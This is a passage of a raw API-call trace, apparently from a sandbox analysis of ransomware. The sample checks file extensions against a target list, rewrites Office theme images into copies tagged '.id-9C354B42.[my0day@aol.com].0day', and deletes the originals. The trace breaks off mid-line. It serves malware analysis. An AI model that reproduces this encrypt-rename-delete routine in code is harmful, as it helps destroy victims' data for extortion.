[0046.287] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.287] lstrlenW (lpString=".dbf") returned 4 [0046.287] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.287] lstrlenW (lpString=".1cd") returned 4 [0046.287] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.287] lstrlenW (lpString=".jpg") returned 4 [0046.287] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.287] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.287] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.288] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=16738) returned 1 [0046.288] CloseHandle (hObject=0x198) returned 1 [0046.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 0x20 [0046.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.289] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.289] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.289] GetLastError () returned 0x0 [0046.289] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x4162, lpOverlapped=0x0) returned 1 [0046.291] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x4170, lpOverlapped=0x0) returned 1 [0046.292] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.292] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.292] SetEndOfFile (hFile=0x1d8) returned 1 [0046.292] CloseHandle (hObject=0x1d8) returned 1 [0046.292] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.292] SetEndOfFile (hFile=0x198) returned 1 [0046.293] CloseHandle (hObject=0x198) returned 1 [0046.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.293] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1 [0046.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.294] lstrlenW (lpString=".doc") returned 4 [0046.294] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.294] lstrlenW (lpString=".docx") returned 5 [0046.294] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.294] lstrlenW (lpString=".pdf") returned 4 [0046.294] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.294] lstrlenW (lpString=".xls") returned 4 [0046.294] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.294] lstrlenW (lpString=".xlsx") returned 5 [0046.294] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.294] lstrlenW (lpString=".ppt") returned 4 [0046.294] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.294] lstrlenW (lpString=".zip") returned 4 [0046.294] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.294] lstrlenW (lpString=".rar") returned 4 [0046.294] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.294] lstrlenW (lpString=".bz2") returned 4 [0046.294] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.294] lstrlenW (lpString=".7z") returned 3 [0046.294] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.294] lstrlenW (lpString=".dbf") returned 4 [0046.294] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.294] lstrlenW (lpString=".1cd") returned 4 [0046.294] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.294] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.294] lstrlenW (lpString=".jpg") returned 4 [0046.294] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.295] lstrlenW (lpString=".doc") returned 4 [0046.295] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.295] lstrlenW (lpString=".docx") returned 5 [0046.295] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.295] lstrlenW (lpString=".pdf") returned 4 [0046.295] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.295] lstrlenW (lpString=".xls") returned 4 [0046.295] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.295] lstrlenW (lpString=".xlsx") returned 5 [0046.295] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.295] lstrlenW (lpString=".ppt") returned 4 [0046.295] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.295] lstrlenW (lpString=".zip") returned 4 [0046.295] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.295] lstrlenW (lpString=".rar") returned 4 [0046.295] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.295] lstrlenW (lpString=".bz2") returned 4 [0046.295] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.295] lstrlenW (lpString=".7z") returned 3 [0046.295] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.295] lstrlenW (lpString=".dbf") returned 4 [0046.295] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.295] lstrlenW (lpString=".1cd") returned 4 [0046.295] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0046.295] lstrlenW (lpString=".jpg") returned 4 [0046.295] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.296] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.296] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.296] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1439) returned 1 [0046.296] CloseHandle (hObject=0x198) returned 1 [0046.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 0x20 [0046.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.296] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.296] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.298] GetLastError () returned 0x0 [0046.298] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x59f, lpOverlapped=0x0) returned 1 [0046.300] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x5a0, lpOverlapped=0x0) returned 1 [0046.301] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.301] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.301] SetEndOfFile (hFile=0x1d8) returned 1 [0046.301] CloseHandle (hObject=0x1d8) returned 1 [0046.301] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.301] SetEndOfFile (hFile=0x198) returned 1 [0046.302] CloseHandle (hObject=0x198) returned 1 [0046.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.302] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.302] lstrlenW (lpString=".doc") returned 4 [0046.302] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.302] lstrlenW (lpString=".docx") returned 5 [0046.303] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.303] lstrlenW (lpString=".pdf") returned 4 [0046.303] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.303] lstrlenW (lpString=".xls") returned 4 [0046.303] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.303] lstrlenW (lpString=".xlsx") returned 5 [0046.303] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.303] lstrlenW (lpString=".ppt") returned 4 [0046.303] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.303] lstrlenW (lpString=".zip") returned 4 [0046.303] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.303] lstrlenW (lpString=".rar") returned 4 [0046.303] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.303] lstrlenW (lpString=".bz2") returned 4 [0046.303] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.303] lstrlenW (lpString=".7z") returned 3 [0046.303] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.303] lstrlenW (lpString=".dbf") returned 4 [0046.303] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.303] lstrlenW (lpString=".1cd") returned 4 [0046.303] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.303] lstrlenW (lpString=".jpg") returned 4 [0046.303] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.303] lstrlenW (lpString=".doc") returned 4 [0046.303] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.303] lstrlenW (lpString=".docx") returned 5 [0046.304] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.304] lstrlenW (lpString=".pdf") returned 4 [0046.304] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.304] lstrlenW (lpString=".xls") returned 4 [0046.304] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.304] lstrlenW (lpString=".xlsx") returned 5 [0046.304] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.304] lstrlenW (lpString=".ppt") returned 4 [0046.304] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.304] lstrlenW (lpString=".zip") returned 4 [0046.304] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.304] lstrlenW (lpString=".rar") returned 4 [0046.304] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.304] lstrlenW (lpString=".bz2") returned 4 [0046.304] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.304] lstrlenW (lpString=".7z") returned 3 [0046.304] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.304] lstrlenW (lpString=".dbf") returned 4 [0046.304] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.304] lstrlenW (lpString=".1cd") returned 4 [0046.304] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0046.304] lstrlenW (lpString=".jpg") returned 4 [0046.304] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.304] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0046.304] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.305] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=37112) returned 1 [0046.305] CloseHandle (hObject=0x198) returned 1 [0046.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 0x20 [0046.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.305] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.305] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.306] GetLastError () returned 0x0 [0046.306] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x90f8, lpOverlapped=0x0) returned 1 [0046.549] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x9100, lpOverlapped=0x0) returned 1 [0046.551] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.551] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.551] SetEndOfFile (hFile=0x1d8) returned 1 [0046.551] CloseHandle (hObject=0x1d8) returned 1 [0046.551] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.551] SetEndOfFile (hFile=0x198) returned 1 [0046.552] CloseHandle (hObject=0x198) returned 1 [0046.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.552] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1 [0046.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.553] lstrlenW (lpString=".doc") returned 4 [0046.553] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.553] lstrlenW (lpString=".docx") returned 5 [0046.553] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.553] lstrlenW (lpString=".pdf") returned 4 [0046.553] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.553] lstrlenW (lpString=".xls") returned 4 [0046.553] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.553] lstrlenW (lpString=".xlsx") returned 5 [0046.553] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.553] lstrlenW (lpString=".ppt") returned 4 [0046.553] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.553] lstrlenW (lpString=".zip") returned 4 [0046.553] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.553] lstrlenW (lpString=".rar") returned 4 [0046.553] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.553] lstrlenW (lpString=".bz2") returned 4 [0046.553] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.553] lstrlenW (lpString=".7z") returned 3 [0046.553] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.553] lstrlenW (lpString=".dbf") returned 4 [0046.553] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.553] lstrlenW (lpString=".1cd") returned 4 [0046.553] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.554] lstrlenW (lpString=".jpg") returned 4 [0046.554] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.554] lstrlenW (lpString=".doc") returned 4 [0046.554] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString=".docx") returned 5 [0046.554] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.554] lstrlenW (lpString=".pdf") returned 4 [0046.554] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString=".xls") returned 4 [0046.554] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.554] lstrlenW (lpString=".xlsx") returned 5 [0046.554] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.554] lstrlenW (lpString=".ppt") returned 4 [0046.554] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.554] lstrlenW (lpString=".zip") returned 4 [0046.554] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.554] lstrlenW (lpString=".rar") returned 4 [0046.554] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.554] lstrlenW (lpString=".bz2") returned 4 [0046.554] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.554] lstrlenW (lpString=".7z") returned 3 [0046.554] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.554] lstrlenW (lpString="C:\\Program Files\\Common 